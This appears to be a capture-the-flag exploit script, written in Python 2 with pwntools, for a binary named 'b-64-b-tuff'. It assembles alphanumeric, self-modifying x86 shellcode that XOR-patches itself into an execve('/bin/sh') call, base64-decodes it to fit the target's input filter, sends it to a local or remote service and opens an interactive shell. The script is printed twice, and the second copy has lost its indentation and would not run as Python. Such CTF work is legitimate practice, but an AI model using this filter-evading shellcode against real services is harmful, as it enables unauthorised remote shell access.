Grazfather/bt.py

## bt.py
import sys

from pwn import *


def exploit():
    r.recvuntil("start: ")
    addr = r.recv(10)
    addr = int(addr, 16)
    print hex(addr)
    valid = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

    code = """
        push eax
        pop ecx # Use to store PC
        push  0x58
        pop eax
        xor al, 0x58 # eax = 0

        xor al, 0x7a
        xor [ecx+0x42], al # XOR / in path
        xor [ecx+0x43], al # XOR / in path
        xor [ecx+0x4b], al # XOR / in path
        xor al, 0x7a # eax = 0
        xor al, 0x63
        xor [ecx+0x50], al # XOR pop ebx
        xor al, 0x63 # eax = 0
        xor al, 0x54
        xor [ecx+0x64], al # XOR sub al, 0x36
        xor al, 0x54 # eax = 0
        dec eax # eax = 0xffffff
        xor [ecx+0x66], al # XOR first byte of syscall
        xor [ecx+0x67], al # XOR second byte of syscall
        push  0x58
        pop eax
        xor al, 0x58 # eax = 0
        xor al, 0x4e
        xor [ecx+0x67], al # XOR second byte of syscall
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        //xor    eax,eax
        push  0x58
        pop eax
        xor al, 0x58 # eax = 0

        push   eax
        push   0x68735555 # needs patch
        push eax
        pop edx
        push eax
        pop edx
        push   0x6e696255 # needs patch

        // mov    ebx,esp
        push esp
        //pop ebx # needs patch
        .byte 0x38

        //mov    ecx,eax
        push eax
        pop ecx

        // mov    edx,eax
        push eax
        pop edx

        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding
        xor al, 0x66 # padding

        //mov al, 0xb
        push 0x41
        pop eax
        // sub al, 0x36 # 2b 36 Needs patch to 2b
        .byte 0x78, 0x36

        //int 0x80 = cd 80
        .byte 0x32, 0x31 #int 0x80 after XORs
        .byte 0x41 # padding
        .byte 0x41 # padding
    """
    sc = asm(code)

    for b in sc:
        if b not in valid:
            print "{} ({:02x}) is not valid".format(b, ord(b))
    print disasm(sc)
    print sc
    sc += "==="

    r.send(sc.decode('base64'))
    r.interactive()

if __name__ == "__main__":
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit()
    else:
        r = process(["./b-64-b-tuff"], env={"LD_PRELOAD":""})
        log.info("PID: {}".format(util.proc.pidof(r)))
        gdb.attach(r)
        exploit()
	import sys

	from pwn import *


	def exploit():
	r.recvuntil("start: ")
	addr = r.recv(10)
	addr = int(addr, 16)
	print hex(addr)
	valid = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

	code = """
	push eax
	pop ecx # Use to store PC
	push 0x58
	pop eax
	xor al, 0x58 # eax = 0

	xor al, 0x7a
	xor [ecx+0x42], al # XOR / in path
	xor [ecx+0x43], al # XOR / in path
	xor [ecx+0x4b], al # XOR / in path
	xor al, 0x7a # eax = 0
	xor al, 0x63
	xor [ecx+0x50], al # XOR pop ebx
	xor al, 0x63 # eax = 0
	xor al, 0x54
	xor [ecx+0x64], al # XOR sub al, 0x36
	xor al, 0x54 # eax = 0
	dec eax # eax = 0xffffff
	xor [ecx+0x66], al # XOR first byte of syscall
	xor [ecx+0x67], al # XOR second byte of syscall
	push 0x58
	pop eax
	xor al, 0x58 # eax = 0
	xor al, 0x4e
	xor [ecx+0x67], al # XOR second byte of syscall
	xor al, 0x66 # padding
	xor al, 0x66 # padding
	xor al, 0x66 # padding
	xor al, 0x66 # padding
	//xor eax,eax
	push 0x58
	pop eax
	xor al, 0x58 # eax = 0

	push eax
	push 0x68735555 # needs patch
	push eax
	pop edx
	push eax
	pop edx
	push 0x6e696255 # needs patch

	// mov ebx,esp
	push esp
	//pop ebx # needs patch
	.byte 0x38

	//mov ecx,eax
	push eax
	pop ecx

	// mov edx,eax
	push eax
	pop edx

	xor al, 0x66 # padding
	xor al, 0x66 # padding
	xor al, 0x66 # padding
	xor al, 0x66 # padding
	xor al, 0x66 # padding
	xor al, 0x66 # padding

	//mov al, 0xb
	push 0x41
	pop eax
	// sub al, 0x36 # 2b 36 Needs patch to 2b
	.byte 0x78, 0x36

	//int 0x80 = cd 80
	.byte 0x32, 0x31 #int 0x80 after XORs
	.byte 0x41 # padding
	.byte 0x41 # padding
	"""
	sc = asm(code)

	for b in sc:
	if b not in valid:
	print "{} ({:02x}) is not valid".format(b, ord(b))
	print disasm(sc)
	print sc
	sc += "==="

	r.send(sc.decode('base64'))
	r.interactive()

	if __name__ == "__main__":
	log.info("For remote: %s HOST PORT" % sys.argv[0])
	if len(sys.argv) > 1:
	r = remote(sys.argv[1], int(sys.argv[2]))
	exploit()
	else:
	r = process(["./b-64-b-tuff"], env={"LD_PRELOAD":""})
	log.info("PID: {}".format(util.proc.pidof(r)))
	gdb.attach(r)
	exploit()